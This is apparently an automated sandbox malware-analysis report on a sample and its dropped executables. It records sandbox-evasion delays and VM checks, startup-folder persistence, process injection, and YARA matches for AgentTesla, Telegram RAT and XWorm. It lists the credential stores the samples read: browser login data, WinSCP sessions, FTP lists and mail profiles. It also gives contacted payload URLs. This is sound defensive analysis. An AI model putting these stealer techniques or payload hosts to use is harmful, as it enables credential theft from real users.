Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97750
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97640
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97531
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97422
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97312
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97203
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97094
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96875
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96765
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96656
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96546
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96437
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96328
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96219
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96078
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 95967
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 95789
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99407
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99188
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99063
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98938
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98813
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98688
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98578
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98469
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98344
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98235
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98110
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97985
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97840
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97715
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97609
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97493
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97375
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97266
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97141
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97016
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96907
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96782
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96657
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96547
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96438
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96313
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96188
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 96063
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 95938
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 95828
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 95719
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: Ref#2056119.exe, 00000000.00000002.2053393935.0000000006F30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: iNHGFs8Tfb
Source: ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: Liphmahu.exe, 00000004.00000002.2191181764.000000000083B000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.0000000001491000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Ref#2056119.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Ref#2056119.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory written: C:\Users\user\Desktop\Ref#2056119.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory written: C:\Users\user\AppData\Local\Temp\Liphmahu.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory written: C:\Users\user\AppData\Roaming\ishon.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process created: C:\Users\user\Desktop\Ref#2056119.exe "C:\Users\user\Desktop\Ref#2056119.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe "C:\Users\user\AppData\Local\Temp\Liphmahu.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"

Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Users\user\Desktop\Ref#2056119.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Liphmahu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Users\user\Desktop\Ref#2056119.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Liphmahu.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ishon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Ref#2056119.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 6104, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Ref#2056119.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\ishon.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Ref#2056119.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ishon.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ishon.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ishon.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 6104, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	25 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	321 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ref#2056119.exe	37%	ReversingLabs
Ref#2056119.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\ishon.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Liphmahu.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ishon.exe	37%	ReversingLabs

Source	Detection	Scanner	Label
89.40.31.232	0%	Avira URL Cloud	safe
https://cia.tf	0%	Avira URL Cloud	safe
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdf	0%	Avira URL Cloud	safe
https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HI	0%	Avira URL Cloud	safe
https://cia.tf/417440cce6502c1c57308172e9826dec.mp4	0%	Avira URL Cloud	safe
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=	0%	Avira URL Cloud	safe
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cia.tf	172.67.129.178	true	false		unknown
api.ipify.org	104.26.13.205	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cia.tf/417440cce6502c1c57308172e9826dec.mp4	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/	false		high
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdf	false	Avira URL Cloud: safe	unknown
